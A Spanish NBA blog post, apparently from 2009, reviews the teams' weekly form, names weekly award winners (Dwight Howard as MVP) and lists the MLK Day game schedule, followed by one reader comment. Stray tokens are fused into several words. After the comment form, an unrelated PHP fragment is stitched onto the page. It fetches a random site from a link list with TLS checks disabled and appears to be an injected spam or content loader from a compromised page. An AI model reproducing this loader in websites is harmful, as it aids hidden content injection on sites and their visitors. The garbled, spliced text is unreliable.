Informe semanal (Semana 12)

19 de January de 2009 por txusma

Es un triste lunes en general, y más si el día anterior tan solo se han disputado 2 partidos en la NBA: la victoria de los Suns frente a los Raptors (que jugaron sin un base propiamente dicho la mayoría de minutos) y de los Heat frente a Oklahoma. Hay tan poca chicha que lo mejor es que nos centremos en un nuevo Informe Semanal.jnelsondhoward

ON FIRE:

Los Magic continúan mostrándose intratables y ya acumulan 7 victorias consecutivas echándole el aliento en el cogote a los Cavs de LeBron James. En esta última semana, 3 victorias más para el saco, 2 de ellas de gran calidad frente a Lakers y Nuggets. ¿Aguantarán el ritmo hasta final de temporada? Los que parece que se han recuperado son los Celtics, que también han cerrado su semana con el casillero de derrotas en blanco aunque hay que decir que se han enfrentado tan solo a dos equipos medio-flojos: Raptors y Nets. Los Sixers, por su parte,  confirman que sin Brand juegan mejor y mientras esperan su retorno ya suman 7 partidos sin perder. Por último, entre críticas a su estilo de juego y a los traspasos realizados, Larry Brown  consigue colocar a los Bobcats en los puestos más altos del informe semanal gracias a sus 2 victorias y 0 derrotas de la semana.

AL TRAN-TRAN

Miami Heat consigue 3 victorias que le permiten situarse a tiro de piedra de los Pistons en la clasificación mientras que San Antonio, Cleveland, Indiana y Denver son los otros equipos que cierran en positivo en la semana.

La derrota de los Cavs fue a manos de los Bulls, que en una semana complicada han conseguido ganar y perder los mismos partidos: 2. En la misma situación han acabado Hornets (irregulares como ellos solos), Knicks (victoria precisamente frente a NO), Bucks (una semana más en Playoffs), Suns, Blazers, Jazz y unos sorprendes Thunder.

También consiguen terminar la semana sin balance negativo Minnesota, Golden State, Clippers y Houston Rockets, que no podrán contar con McGrady ni Artest al menos durante un par de semanas.

aiAL BORDE DEL ABISMO:

Evidentemente no están al borde del abismo pero sus dos derrotas frente a San Antonio Spurs y Orlando Magic dejan a los Lakers ligeramente tocados. Atlanta parece que se desinfla con la baja de Horford y en los Mavs, Dirk esta más solo que nunca (y eso que juega con un tal Jason Kidd). Sacramento y Washington también han conseguido sumar una victoria, lo mismo que New Jersey con la diferencia de que estos últimos han perdido 3 partidos esta semana y salen de los puestos de Playoffs después de mucho tiempo.

EN EL POZO:

Esta semana los Pistons recuperaban a todos los lesionados y por eso la encaraban con cierto optimismo. El resultado no ha podido ser más desolador: 4 derrotas a cada cual más dolorosa. Billups debe de estar riendo a carcajadas en casa. Otros que no han conseguido sumar ni una victoria son los Raptors que se hunden en la clasificación y que buscan desesperadamente un traspaso que les insufle algo de aire. De momento, sólo pueden esperar que la vuelta de Calderón mejore sus resultados. Y por último, los Grizzlies, que aparte de perder sus partidos también pierden el buen ambiente en su equipo, si es que alguna vez existió.

PREMIOS

MVP: Dwight Howard sigue sembrando el terror bajo los aros en cada partido, sea quien sea el rival. Superman ha despachado la semana con medias de 21.3 puntos, 18.3 rebotes, 2.3 tapones y 2 recuperaciones. Su acierto en tiros de campo no ha sido brillante, pero ha anotado un 67% de sus tiros libres brooky, ante todo, ha conducido a su equipo a tres nuevas victorias -y ya van 7 seguidas-. Otros candidatos al premio eran Nowitzki (34.3 puntos y 11.7 rebotes), LeBron James (29 puntos, 13 rebotes y 8 asistencias) o Kobe Bryant (30 puntos, 9 rebotes y 8.3 asistencias).

El rookie: Brook Lopez se ha colado entre los máximos anotadores, reboteadores y taponadores de la semana con magníficos promedios de 22.3, 9.3 y 2.2 respectivamente.

La sorpresa: Debería de dejar de sorprendernos, pero Von Wafer se lleva el galardón al ser, una semana más, uno de los puntales ofensivos de los Rockets. Además, logró su media de 20 puntos con un 53% de acierto. En los ocho partidos que ha disputado como titular, Wafer ha anotado al menos 12 puntos.

La decepción: Empezó bien la semana ante los Thunder, pero en las tres derrotas consecutivas que llevan los Nets, Vince Carter promedió 7.3 puntos con un 21.8% de acierto en tiros de campo, 3.7 rebotes, 2.3 asistencias, 1 robo y 0 tapones.

RAZONES PARA TRASNOCHAR

Hoy, en realidad, no necesitaremos trasnochar para ver NBA. Entre las muchas bondades que presenta el Martin Luther King Day está el que los partidos empiezan muy pronto, tanto como nuestras 7 de la tarde. Os detallamos cómo será la jornada del MLK Day:

19:00 h. Mavs @ Sixers

19:00 h. Bulls @ Knickslebjamesko24

20:00 h. Spurs @ Bobcats

20:00 h. Raptors @ Hawks

20:00 h. Nuggets @ Rockets

21:30 h. Pacers @ Hornets

21:30 h. T’Wolves @ Clippers

22:00 h. Wizards @ Warriors

23:30 h. Pistons @ Grizzlies

02:00 h. Suns @ Celtics

04:00 h. Bucks @ Blazers

04:30 h. Cavs @ Lakers

Lógicamente, nuestras razones para trasnochar se van al Cavs-Lakers. Tanto si lo planteamos como un duelo individual, con el James vs Bryant, como en el plano colectivo, con el enfrentamiento entre los dos líderes de Conferencia, el partido cuenta con todos los ingredientes para ser un magnífico espectáculo. Los angelinos tratarán de evitar su tercera derrota consecutiva, tras las encajadas ante Spurs y Magic. Los de Ohio buscan una victoria de mucho prestigio que les ayude a consolidar su liderato. LeBron y Bryant se verán las caras, muy probablemente, en ambos lados de la cancha. Promete ser una noche grande.

Comenta

Un comentario a esta entrada

  1. El_Pecharroman dice:
    #1

    En su día, el traspaso Iverson – Billups me pareció bueno para ambos equipos. Ahora el tiempo me está quitando la razón: parece que a Denver le ha hecho mucho más bien que a Detroit.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>